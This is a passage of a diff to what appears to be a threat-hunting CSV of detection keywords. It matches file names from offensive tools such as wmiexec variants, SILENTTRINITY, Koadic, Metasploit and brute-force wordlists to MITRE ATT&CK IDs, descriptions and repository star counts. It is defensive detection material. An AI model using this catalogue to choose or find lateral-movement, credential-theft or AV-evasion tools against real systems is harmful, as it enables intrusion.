Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*wmiexec2.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*wmiexec2-main*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*WMIExecHash.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*WMIExecHash.boo","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*WMIExec-main*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","145","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*WMIExec-main*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec-Pro.git*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*wmiexec-pro.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*wmi-lateral-movement.*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*WMImplant*","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","767","152","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*WMIPersist.*","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","2","112","34","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z" -"*wmipersist.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*wmipersist.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*wmipersistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*WMIPersistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*WMIPersistImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*WMI-ProcessCreate.cpp*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" -"*WMIReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*WMIReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*wmispawn select*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*WmiSploit.git*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*WmiSploit-master/zip*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" -"*WNFarmDynamite_h.cs*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*word_gen_b_varlen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*word_unc_injector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Wordlist/ftp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/ftp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/ftp_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/mssql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/mysql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/oracle_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/pass.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/pop_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/pop_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/postgres_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/smtp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/smtp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/snmp.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/sql_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/sql_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/ssh_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/ssh_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/ssh_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/telnet_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/telnet_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/telnet_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/user.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/vnc_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/windows_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/windows_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*WNFarmDynamite_h.cs*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*word_gen_b_varlen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*word_unc_injector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Wordlist/ftp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ftp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ftp_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/mssql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/mysql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/oracle_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/pass.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/pop_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/pop_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/postgres_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/smtp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/smtp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/snmp.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/sql_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/sql_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ssh_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ssh_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ssh_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/telnet_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/telnet_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/telnet_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack 